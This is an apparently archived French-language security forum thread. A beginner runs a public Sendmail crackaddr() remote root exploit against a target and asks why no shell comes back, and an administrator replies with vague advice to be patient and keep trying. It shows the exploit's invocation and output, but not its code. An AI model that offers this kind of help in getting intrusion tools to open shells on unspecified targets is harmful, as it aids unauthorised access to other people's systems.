FORUM MP | Sécurité : bug avec remote exploit

COMMUNAUTE MP

Identifiez vous ...

DOMAINE MP

Bavardages

Langages Généraux

Langages Web

Langages DotNet

Autres langages

Dev. Jeux Video

Sécurité

Sys. Exploitation

Graphismes

Logiciels

Réseaux

Bases de données

Méthodologies

Emplois High-tech

Aide juridique

Articles juridiques

FORUM

CHAT MP IRC

Votre pseudo ...

Srv: irc.moteurprog.com

Chan: #MoteurProg

PARTICIPER

Plus de 3500 emplois.

Visiteur MP

bug avec remote exploit
	Forum : SÉCURITÉ Sous Catégorie : Aucune Type du sujet : Sujet Normale FAQ : FAQ SÉCURITÉ
		SUIVI PAR MAIL INACTIF
		SUJET NON RESOLU
		SUJET ACTIF
		N'APPARTIENT PAS A LA FAQ

FORUM SÉCURITÉ
	Page précedente	Page suivante

venturi
Nouveau membre

Inscrit : 15/07/2004
Messages : 9

#144160 Posté le 16/10/07 à 16:05

Bonjour,
je suis debutant dans la securite informatique.
je m'interesse surtout aux exploits et a l'intrusion reseau.
je suis presentement en train de tester le bug (crackaddr()) en remote du sendmail 8.10.x.
voici mon probleme:

--------------------------------
vreezver@Linux:[$] ./exploit <target_ip> <mon_ip> <targer_number> # ici le target number est 0

Sendmail <8.12.8 crackaddr() exploit by bysin
from the l33tsecurity crew

Resolving address... Address found
Connecting... Connected!
Sending exploit... Exploit sent!
Waiting for root prompt... # Ensuite plus rien... J'ai beau faire un netcat, en vain.

vreezver@Linux:[$]
-------------------------------------------------------
je pense que le probleme vient du fait que je travaille a partir d'un reseau local et que je recois la connexion internet d'un serveur.

-peut etre que le "root prompt" est bloqué par un firewall (le notre peut etre ou celui du target)

-peut etre que c'est le fait que le "mon_ip" n'est pas le bon, car je ne sais pas si je devrais utiliser le IP externe de ma machine ou celui du LAN.

La question centrale est : "Est ce que je recois vraiment le shell? si oui pourquoi je n'arrive pas a l'utiliser?"

Merci de votre interet a me repondre et si possible envoyez moi la reponse par mail
vreezver@yahoo.fr
__________________________
celui qui sait ne parle pas, celui qui parle ne sait pas....
vulnerant omnes, ultima necat....

HAUT DE PAGE

Publicité

Inscrit : X
Messages : X

#Aucun

HAUT DE PAGE

Coolboy
Administrateur

Inscrit : 25/06/2004
Messages : 672

#156513 Posté le 17/09/08 à 14:05

Il est possible que le kernel soit patché, tout simplement.

Sinon il faut patienter, la pluspart du temps quand on utilise ce genre d'exploits, ils provoquent un buffer overflow de la mémoire pour "créer" un passage, il faut donc attendre ce moment, un exploit n'est pas instantané, et ne marche pas non plus à tout les coups sur un même kernel, car les addresses mémoire changent, il faut donc persévérer =)
__________________________
Administrateur Moteurprog.com

HAUT DE PAGE

PAGE : [1]

.: Site Web développé par Julien Pichot et l'équipe MPWG avec www.evolvia-web.com :.